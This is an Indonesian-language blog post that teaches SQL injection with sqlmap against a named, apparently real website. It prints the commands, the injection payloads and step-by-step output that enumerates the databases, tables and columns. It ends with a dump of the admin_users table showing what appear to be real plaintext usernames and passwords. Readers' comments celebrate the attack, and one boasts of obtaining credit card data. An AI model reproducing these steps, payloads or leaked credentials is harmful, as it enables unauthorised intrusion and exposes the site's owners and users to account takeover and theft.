Pertama" siapin brang"x
2.sqlmap ( http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.zip/download?use_mirror=nchc )
3.kopi + rokok
langsung ja qt ke Tkp target.
*************************************************************************/
1.kita coba analisis websitenya dengan menggunakan fungsi
(-u)
Hasilnya nnti :
[*] starting at 12:49:03
[12:49:03] [INFO] testing connection to the target url
[12:49:08] [INFO] testing if the url is stable, wait a
few seconds
[12:49:13] [INFO] url is stable
[12:49:13] [INFO] testing if GET parameter 'id' is
dynamic
[12:49:17] [INFO] confirming that GET parameter 'id' is
dynamic
[12:49:21] [INFO] GET parameter 'id' is dynamic
[12:49:22] [INFO] heuristics detected web page charset
'ascii'
[12:49:22] [INFO] heuristic test shows that GET parameter
'id' might be injectab
le (possible DBMS: MySQL)
[12:49:22] [INFO] testing for SQL injection on GET
parameter 'id'
[12:49:22] [INFO] testing 'AND boolean-based blind -
WHERE or HAVING clause'
[12:49:23] [WARNING] reflective value(s) found and
filtering out
[12:49:36] [INFO] GET parameter 'id' is 'AND
boolean-based blind - WHERE or HAVI
NG clause' injectable
[12:49:36] [INFO] testing 'MySQL >= 5.0 AND
error-based - WHERE or HAVING clause
'
[12:49:37] [INFO] GET parameter 'id' is 'MySQL >= 5.0
AND error-based - WHERE or
HAVING clause' injectable
[12:49:37] [INFO] testing 'MySQL > 5.0.11 stacked
queries'
[12:49:38] [INFO] testing 'MySQL > 5.0.11 AND
time-based blind'
[12:50:39] [INFO] GET parameter 'id' is 'MySQL >
5.0.11 AND time-based blind' in
jectable
[12:50:39] [INFO] testing 'MySQL UNION query (NULL) - 1
to 20 columns'
[12:50:39] [INFO] automatically extending ranges for
UNION query injection techn
ique tests as there is at least one other potential
injection technique found
[12:50:46] [INFO] ORDER BY technique seems to be usable.
This should reduce the
time needed to find the right number of query columns.
Automatically extending t
he range for current UNION query injection technique test
[12:50:55] [INFO] target url appears to have 4 columns in
query
injection not exploitable with NULL values. Do you want
to try with a random int
eger value for option '--union-char'? [Y/n] y
[12:51:18] [WARNING] if UNION based SQL injection is not
detected, please consid
er forcing the back-end DBMS (e.g. --dbms=mysql)
[12:51:18] [INFO] testing 'Generic UNION query (71) - 1
to 20 columns'
GET parameter 'id' is vulnerable. Do you want to keep
testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a
total of 39 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE
or HAVING clause
Payload: id=3 AND 5377=5377
Type: error-based
Title: MySQL >= 5.0 AND error-based
- WHERE or HAVING clause
Payload: id=3 AND (SELECT 1217
FROM(SELECT COUNT(*),CONCAT(0x3a686c683a,(SEL
ECT (CASE WHEN (1217=1217) THEN 1 ELSE 0
END)),0x3a6e65633a,FLOOR(RAND(0)*2))x F
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=3 AND SLEEP(5)
---
[12:51:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 5.0
[12:51:33] [INFO] fetched data logged to text files under
'C:\Python27\sqlmap\ou
[*] shutting down at 12:51:33
*************************************************************************/
2.Untuk mencari semua database disini kita akan mencari
semua database yang ada dalam server target
[*] starting at 12:57:16
[12:57:16] [INFO] resuming back-end DBMS 'mysql'
[12:57:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a
total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE
or HAVING clause
Payload: id=3 AND 5377=5377
Type: error-based
Title: MySQL >= 5.0 AND error-based
- WHERE or HAVING clause
Payload: id=3 AND (SELECT 1217
FROM(SELECT COUNT(*),CONCAT(0x3a686c683a,(SEL
ECT (CASE WHEN (1217=1217) THEN 1 ELSE 0
END)),0x3a6e65633a,FLOOR(RAND(0)*2))x F
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=3 AND SLEEP(5)
---
[12:57:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 5.0
[12:57:21] [INFO] fetching database names
[12:57:22] [INFO] heuristics detected web page charset
'ascii'
[12:57:22] [INFO] the SQL query used returns 2 entries
[12:57:23] [INFO] retrieved: information_schema
[12:57:24] [INFO] retrieved: db197631714
available databases [2]:
[*] db197631714
[*] information_schema
[12:57:24] [INFO] fetched data logged to text files under
'C:\Python27\sqlmap\output\www.zenithcafe.co.uk'
[*] shutting down at 12:57:24
*************************************************************************/
BINGGO QT DPET DATA BASENYA :
available databases [2]:
[*] db197631714
[*] information_schema
*************************************************************************/
3.kalau udah dapet databasenya, kita tinggal mencari
tablenya and kolomnya :D
ists_profile.php?id=3 -v 0
[*] starting at 13:04:47
sqlmap identified the following injection points with a
total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE
or HAVING clause
Payload: id=3 AND 5377=5377
Type: error-based
Title: MySQL >= 5.0 AND error-based
- WHERE or HAVING clause
Payload: id=3 AND (SELECT 1217
FROM(SELECT COUNT(*),CONCAT(0x3a686c683a,(SEL
ECT (CASE WHEN (1217=1217) THEN 1 ELSE 0
END)),0x3a6e65633a,FLOOR(RAND(0)*2))x F
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=3 AND SLEEP(5)
---
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 5.0
[13:04:55] [INFO] retrieved: admin_permissions
[13:04:57] [INFO] retrieved: admin_users
[13:04:58] [INFO] retrieved: artist_samples
[13:04:59] [INFO] retrieved: artists
[13:05:00] [INFO] retrieved: events
[13:05:02] [INFO] retrieved: newsletters
[13:05:03] [INFO] retrieved: recipe
[13:05:04] [INFO] retrieved: releases
Database: db197631714
[8 tables]
+-------------------+
| admin_permissions |
| admin_users |
| artist_samples |
|
artists |
|
events |
| newsletters |
|
recipe |
|
releases |
+-------------------+
[*] shutting down at 13:05:05
*************************************************************************/
BINGGO Qt dpet tablenya :D
+-------------------+
| admin_permissions |
| admin_users |
| artist_samples |
|
artists |
| events
|
| newsletters |
|
recipe |
|
releases |
+-------------------+
*************************************************************************/
4.kalau qt udh dapet.. tinggal cari columns target :D
c:\Python27>sqlmap\sqlmap.py --columns
-T admin_users -D db197631714 -u www.zenithcafe.co.uk/artists_profile.php?id=3 -v 0
*************************************************************************/
[*] starting at 13:13:58
sqlmap identified the following injection points with a
total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE
or HAVING clause
Payload: id=3 AND 5377=5377
Type: error-based
Title: MySQL >= 5.0 AND error-based
- WHERE or HAVING clause
Payload: id=3 AND (SELECT 1217
FROM(SELECT COUNT(*),CONCAT(0x3a686c683a,(SEL
ECT (CASE WHEN (1217=1217) THEN 1 ELSE 0
END)),0x3a6e65633a,FLOOR(RAND(0)*2))x F
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=3 AND SLEEP(5)
---
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 5.0
[13:14:37] [INFO] retrieved: username
[13:14:42] [INFO] retrieved: text
[13:14:47] [INFO] retrieved: email
[13:14:52] [INFO] retrieved: text
[13:14:57] [INFO] retrieved: clientname
[13:15:01] [INFO] retrieved: text
[13:15:04] [INFO] retrieved: expires
[13:15:05] [INFO] retrieved: int(11)
[13:15:09] [INFO] retrieved: password
[13:15:10] [INFO] retrieved: text
[13:15:12] [INFO] retrieved: admin
[13:15:13] [INFO] retrieved: tinyint(4)
Database: db197631714
Table: admin_users
[6 columns]
+------------+------------+
| Column |
Type |
+------------+------------+
| admin | tinyint(4) |
| clientname | text |
| email |
text |
| expires | int(11) |
| password |
text |
| username | text
|
+------------+------------+
[*] shutting down at 13:15:13
*************************************************************************/
BINGGO AGAINT :D qt dapet data columns websitenya :D
wkaokwoakwa
+------------+------------+
| Column | Type
|
+------------+------------+
| admin | tinyint(4) |
| clientname | text |
| email |
text |
| expires | int(11) |
| password |
text |
| username |
text |
+------------+------------+
*************************************************************************/
5.sekarang qt tinggal dump file websitenya. supaya dapet
data informasinya wakakak :D
c:\Python27>sqlmap\sqlmap.py
--dump -C username,password -T admin_users -D db197
*************************************************************************/
[*] starting at 13:25:51
sqlmap identified the following injection points with a
total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE
or HAVING clause
Payload: id=3 AND 5377=5377
Type: error-based
Title: MySQL >= 5.0 AND error-based
- WHERE or HAVING clause
Payload: id=3 AND (SELECT 1217
FROM(SELECT COUNT(*),CONCAT(0x3a686c683a,(SEL
ECT (CASE WHEN (1217=1217) THEN 1 ELSE 0
END)),0x3a6e65633a,FLOOR(RAND(0)*2))x F
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND
time-based blind
Payload: id=3 AND SLEEP(5)
---
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 5.0
[13:25:59] [INFO] retrieved: airbiscuit
[13:26:00] [INFO] retrieved: airbiscuit
[13:26:01] [INFO] retrieved: clocks
[13:26:02] [INFO] retrieved: Drawing Clocks
[13:26:04] [INFO] retrieved: clocks
[13:26:05] [INFO] retrieved: Peter
[13:26:06] [INFO] retrieved: Curnow
[13:26:07] [INFO] retrieved: Ian
[13:26:09] [INFO] retrieved: gruv76
[13:26:10] [INFO] retrieved: zenith
[13:26:12] [INFO] retrieved: lovelovelove
[13:26:13] [INFO] retrieved: rogers
[13:26:14] [INFO] retrieved: not
[13:26:15] [INFO] retrieved: Tony Moore
[13:26:16] [INFO] retrieved: Parker
[13:26:17] [INFO] retrieved: Parker
[13:26:18] [INFO] retrieved: rogers
[13:26:19] [INFO] retrieved: Lee Rogers
[13:26:20] [INFO] retrieved: Rusty
[13:26:21] [INFO] retrieved: Rusty
[13:26:22] [INFO] retrieved: sainato
[13:26:22] [INFO] retrieved: Giangi
Database: db197631714
Table: admin_users
[11 entries]
+----------------+--------------+
| username |
password |
+----------------+--------------+
| airbiscuit |
airbiscuit |
| Drawing Clocks |
clocks |
|
Peter |
clocks |
|
Ian |
Curnow |
| zenith
| gruv76 |
| rogers
| lovelovelove |
| Tony Moore |
not |
| Parker
| Parker |
| Lee Rogers |
rogers |
|
Rusty |
Rusty |
| Giangi
| sainato |
+----------------+--------------+
[*] shutting down at 13:26:23
*************************************************************************/
BINGGO KT DPET DATA USERNAME & PASSWORDNYA :D
WOWKOWKO...
+----------------+--------------+
| username |
password |
+----------------+--------------+
| airbiscuit |
airbiscuit |
| Drawing Clocks |
clocks |
|
Peter |
clocks |
|
Ian |
Curnow |
| zenith
| gruv76 |
| rogers
| lovelovelove |
| Tony Moore |
not |
| Parker
| Parker |
| Lee Rogers |
rogers |
|
Rusty |
Rusty |
| Giangi
| sainato |
+----------------+--------------+
3 komentar:
mantap gan...
mau tanya gan...
id=3 ntu dari mana gan...??
Thx gan 100% Vuln .. w dapet CC puas dah.. :D
https://www.facebook.com/dandy.hacker087716282390
Posting Komentar